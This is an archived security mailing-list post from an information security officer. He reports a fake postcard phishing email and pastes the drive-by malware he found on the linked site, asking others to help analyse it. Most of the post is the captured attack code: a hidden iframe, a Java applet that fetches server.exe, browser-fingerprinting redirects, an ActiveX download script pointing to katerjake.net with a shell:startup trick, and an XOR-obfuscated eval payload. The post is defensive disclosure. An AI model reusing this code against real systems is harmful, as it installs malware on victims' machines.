lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3DD5429261A226499E62F940511F6E6A58CE64@BNEEML01.des>
From: peterharvey at emergency.qld.gov.au (Peter B. Harvey (Information Security))
Subject: Hxxp://mercylane.com/ Exploit code

Hi all,

Interesting occurance started to happen today, had about ten people trip
off the virus alerts for Trend Micro JAVA_BYTEVER.A. Please note that
the information given was obscured with xx to prevent unpatched system
infection. At the time of writing I do not know what happens on a system
that runs this code, any help would be appreciated.

The email read as follows:
________________________________________________________________________
____
A Digital Postcards(R) Greeting from John    Korhonen waiting for you at
POSTCARDS.COM!

If you have a modern e-mail program, you can go directly to your card by
clicking:

 http://Postcard.com/pickup/DP_416b029023245c15.
      
*PLEASE* make sure your mail program has not cut the CardID # into 2
lines!! If it has,
you need to use the Old-Fashioned method below.

You can pick-up your postcard the old-fashioned way, by going to the
following URL:

   http://postcard.com/cards/pickup.html.
    
and entering your postcard ID number:   DP_416b029023245c15

If postcard is not picked up within two weeks, it may be removed.

Thank you!
This is a free service of Digital Postcard(R)
________________________________________________________________________
____
The card does not exist however the HTTP links went to mercylane.com
Investigating the site I found this in the sites front page.
________________________________________________________________________
____
xxIFRAME SRC="hxxp://katerjake.net/index1.php" width="0" height="0"
FRAMEBORDER="0" SCROLLING="no" MARGINWIDTH="0"
MARGINHEIGHT="0"xxxx/IFRAMExx
________________________________________________________________________
____


Source of this page reveals.
________________________________________________________________________
____
<html><body>

     <APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1
HEIGHT=1>
     <PARAM NAME="ModulePath" VALUE="hxxp://katerjake.net/server.exe">
     </APPLET>   

<script>

var ie6_page = "hxxp://katerjake.net/indexold.html";
var ie6_sp2_page = "hxxp://katerjake.net/index2.html";

var agt=navigator.userAgent.toLowerCase();
var appVer = navigator.appVersion.toLowerCase();
var minVer = navigator.appMinorVersion.toLowerCase();

var is_win = (navigator.platform.indexOf("Win32") != -1);
var is_opera = (agt.indexOf("opera") != -1);
var is_ie = appVer.indexOf("msie");

if (!is_opera && is_win && is_ie){

     is_minor = parseFloat(appVer.substring(is_ie+5,
appVer.indexOf(';',is_ie)));
     is_major = parseInt(is_minor);

    
     var is_ie51 = (is_minor == 5.5);
     var is_ie6 = (is_minor == 6.0);

    
     if (is_ie51) { document.location = ie51_page; }
     else if (is_ie6) 
     {

        if (minVer.indexOf("sp2") != -1) { document.location =
ie6_sp2_page; } // with sp2
        else
        {   // not sp2 starts


        if (minVer.indexOf("sp1") == -1) { document.location = ie6_page;
} // without sp1
        else
        {
           if (minVer.indexOf("q823353") != -1) { document.location =
"hxxp://katerjake.net/index2.html"; }
           else if (minVer.indexOf("q837009") != -1) { document.location
= "hxxp://katerjake.net/index2.html"; }
                      else { document.location =
"hxxp://katerjake.net/indexold.html"; }
        }

        } // not sp2 ends

     }


}

</script>
</html>
________________________________________________________________________
____
Index 2 has
________________________________________________________________________
____
<script> 
function govn(){  
var w=window.open("javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);xmlHTTP.open
(&quot;GET&quot;,&quot;http://katerjake.net/server.exe&quot;,false);xmlH
TTP.send();var contents =
xmlHTTP.responseBody;document.innerHTML=(&quot;&lt;title&gt;You Need a
better browser&lt;/title&gt;&lt;DIV ID=DS2 align=center
style=position:absolute;left:10;top:-30;&gt;&lt;br&gt;&lt;br&gt;&lt;cent
er&gt;&lt;font face=arial color=black&gt;&lt;b&gt;This web page requires
Opera Comptable browser&lt;/b&gt;&amp;nbspYou can download Opera from
the &lt;a href=http://www.opera.com&gt;Opera Software Group web
site&lt;/a&gt;.&lt;/center&gt;&lt;/div&gt;&lt;html&gt;&lt;iframe
src=shell:startup HEIGHT=5000; WIDTH=5000
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-inde
x:-90;&gt;&lt;/iframe&gt;&lt;body
onload=showpop()&gt;&lt;script&gt;function
showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.
document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,scre
en.height+300);}&lt;/script&gt;&lt;span style=position: absolute; left:
1; top: 1 id=absspan&gt;&lt;/span&gt;&lt;textarea id=txt rows=1 cols=20
style=display:none&gt;&lt;html&gt;&lt;body&gt;&lt;table width=100%
height=100%&gt;&lt;tr ALIGN=LEFT
VALIGN=TOP&gt;&lt;br&gt;&lt;center&gt;&lt;img
src=http://katerjake.net/server.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url(&amp;quot;http://k
aterjake.net/1.gif&amp;quot;);&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/t
able&gt;&lt;/textarea&gt;&lt;/body&gt;&lt;/html&gt;&quot;)');window.clos
e();}},100)","_blank","height=10,width=10,left=10000,top=10000");  
w.location.assign=location.assign;  
location.href="http://localhost";  
}  
govn()  
</script>
________________________________________________________________________
____
Index old has
________________________________________________________________________
____
<html>



<script>
x=35;
es="71;75;70;83;74;77;71;94;5;91;95;71;91;85;25;71;93;81;70;85;86;72;92;
18;28;25;72;14;15;115;2;103;54;116;117;112;1;109;60;122;123;122;127;107;
58;96;97;100;18;113;32;102;103;110;108;127;46;108;109;104;108;69;20;82;8
3;83;81;67;18;88;89;88;91;73;24;94;95;70;69;87;6;68;69;64;70;93;12;74;75
;75;73;91;10;176;177;180;178;161;240;182;183;187;205;175;254;188;189;188
;189;181;228;162;163;162;209;179;226;168;169;173;168;185;232;174;175;146
;229;135;214;148;149;144;158;141;220;154;155;155;153;139;218;128;129;133
;128;145;192;134;135;139;248;159;206;140;141;136;251;229;180;242;243;242
;253;227;178;248;249;253;255;233;184;254;255;230;149;247;166;228;229;224
;148;253;172;234;235;239;156;251;170;208;209;212;213;193;144;214;215;222
;208;207;158;220;221;216;172;213;132;194;195;194;192;211;130;200;201;201
;186;217;136;206;207;306;327;295;374;308;309;308;321;301;380;314;315;312
;318;299;378;288;289;289;338;305;352;294;295;301;346;319;366;300;301;299
;348;261;340;274;275;272;353;259;338;280;281;286;282;265;344;286;287;260
;264;279;326;260;261;258;370;285;332;266;267;270;376;283;330;368;369;374
;263;353;304;374;375;380;369;367;318;380;381;379;379;373;292;354;355;358
;356;371;290;360;361;364;355;377;296;366;367;343;341;327;278;340;341;337
;339;333;284;346;347;347;349;331;282;320;321;321;306;337;256;326;327;330
;319;351;270;332;333;332;313;421;500;434;435;434;455;419;498;440;441;444
;442;425;504;446;447;423;421;439;486;420;421;416;418;445;492;426;427;427
;431;443;490;400;401;404;482;385;464;406;407;414;408;399;478;412;413;408
;493;405;452;386;387;386;384;403;450;392;393;392;510;409;456;398;399;502
;388;487;438;500;501;496;498;493;444;506;507;507;505;491;442;480;481;480
;405;497;416;486;487;490;415;511;430;492;493;488;486;453;404;466;467;466
;416;451;402;472;473;476;479;457;408;478;479;454;452;471;390;452;453;449
;463;477;396;458;459;462;440;475;394;560;561;564;560;545;624;566;567;574
;561;559;638;572;573;568;587;565;612;546;547;551;596;563;610;552;553;553
;602;569;616;558;559;530;615;519;598;532;533;528;542;525;604;538;539;538
;616;523;602;512;513;516;519;529;576;518;519;526;524;543;590;524;525;521
;519;613;564;626;627;630;512;611;562;632;633;636;627;617;568;638;639;615
;613;631;550;612;613;608;531;637;556;618;619;618;542;635;554;592;593;592
;593;577;528;598;599;602;601;591;542;604;605;601;603;597;516;578;579;579
;588;595;514;584;585;589;587;601;520;590;591;694;692;679;758;692;693;693
;707;685;764;698;699;702;703;683;762;672;673;677;679;689;736;678;679;686
;684;703;750;684;685;681;679;645;724;658;659;659;657;643;722;664;665;664
;749;649;728;670;671;647;649;663;710;644;645;644;755;669;716;650;651;651
;654;667;714;752;753;756;752;737;688;758;759;767;763;751;702;764;765;760
;758;757;676;738;739;739;741;755;674;744;745;749;751;761;680;750;751;726
;674;711;662;724;725;720;722;717;668;730;731;731;729;715;666;704;705;704
;705;721;640;710;711;715;700;735;654;716;717;717;700;805;884;818;819;822
;835;803;882;824;825;828;845;809;888;830;831;806;803;823;870;804;805;800
;854;829;876;810;811;810;808;827;874;784;785;788;784;769;848;790;791;799
;797;783;862;796;797;797;874;791;792;795;776;848;858;853;834;853;860;852
;847;786;862;850;848;819;804;874;874;895;";
var ds=new String();
ads=es.split(";");
k=ads.length-1;
m=5;
for(var j=0;j<k;j++)
{e=ads[j];d=e^x;m+=3;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)

</script>
</html>

________________________________________________________________________
____

Again I have not analysed what the code does yet.
____________________________________________
Peter Harvey
Information Security Officer
Dept. Emergency Services - QLD
Phone: +61 7 3109 7213
____________________________________________

This correspondence is for the named persons only.
It may contain confidential or privileged information or both.
No confidentiality or privilege is waived or lost by any mis transmission.
If you receive this correspondence in error please delete it from your system immediately and notify the sender.
You must not disclose, copy or relay on any part of this correspondence, if you are not the intended recipient.
Any opinions expressed in this message are those of the individual sender except where the sender expressly,
and with the authority, states them to be the opinions of the Department of Emergency Services, Queensland.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ